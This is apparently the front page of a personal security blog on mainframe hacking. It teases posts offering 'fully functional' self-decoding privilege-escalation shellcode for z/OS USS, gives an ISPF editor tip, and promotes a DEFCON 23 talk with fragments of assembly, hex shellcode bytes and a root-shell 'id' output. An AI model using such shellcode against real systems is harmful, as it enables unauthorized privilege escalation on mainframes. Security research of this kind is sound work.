Shellcode Freebie!

Got a burning privesc vulnerable binary on your USS? How about feeding it a little self-decoding shellcode? (Hint: this is fully functional, find a C stub and try it yourself!) … Continue reading Shellcode Freebie!

Tips / Tricks – 7/2/15 (update)

Updated. Added update to the packet capture section below, included pcap export!

ISPF editor

Want more real estate in your ISPF editor? In an editing session enter EDSET in the command line, then check the line marked:

X Remove action bars in ISPF edit and view panels

This will remove the menu bars and… Continue reading Tips / Tricks – 7/2/15 (update)

Mainframe shellcode

Come see my talk at DEFCON23.

…
SLR   14,14
MVC   32(4,13),16(14)
L     14,32(,13)
…
\x1f\xee
\xd2\x03\xd0\x20\xe0\x10
\x58\xe0\xd0\x20
…
# id
uid=0(IBMUSER) gid=0(SYS1)
…

Stay tuned to this site and follow @bigendiansmalls for sneak peeks at what I will be presenting!

Adventures in securing a “dinosaur”

This blog is my own chronicle of adventures in writing exploits, cryptography, security and who knows what else. Specifically, though, I’m going to start by sharing technical specifics to support my upcoming co-talk at Defcon 23. Our talk, titled “Security Necromancy: Further Adventures in Mainframe Hacking”, seeks to educate the security community to actively dig… Continue reading Adventures in securing a “dinosaur”

Opinions expressed are solely my own and do not express the views or opinions of my employer, or likely anyone else in the world, aside from myself.

Comments are moderated solely for relevance and to prevent spam.
